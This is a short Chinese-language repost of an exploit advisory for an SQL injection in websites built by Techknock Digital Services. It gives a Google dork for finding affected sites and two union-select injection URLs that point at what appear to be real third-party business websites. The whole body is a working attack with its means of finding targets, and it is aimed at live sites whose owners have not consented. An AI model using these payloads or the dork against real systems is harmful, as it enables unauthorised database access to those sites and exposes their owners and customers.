Techknock数字服务SQL注入漏洞分析

本文详细分析了Techknock数字服务存在的SQL注入漏洞,包含具体的漏洞利用PoC和Google Dork信息,适用于网络安全研究人员参考学习。

Techknock数字服务 - SQL注入

2025.05.22
behrouz mansoori (IR)

风险等级:中等
本地利用:否
远程利用:是
CVE:暂无
CWE:暂无
Dork:“Developed By Techknock Digital Services”

#漏洞标题:Techknock数字服务 - SQL注入 #日期:2025-05-21 #漏洞作者:Behrouz Mansoori #Google Dork:“Developed By Techknock Digital Services” #分类:webapps #测试环境:Mac, Firefox

漏洞验证:

演示:

http://hailmaryrefrigeration.co.in/products.php?id=-42%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+&catid=1

http://www.rs-enterprises.co.in/product-detail.php?id=-5%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+&catid=1

#发现者:Behrouz mansoori #Instagram:Behrouz_mansoori #邮箱:mr.mansoori@yahoo.com

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次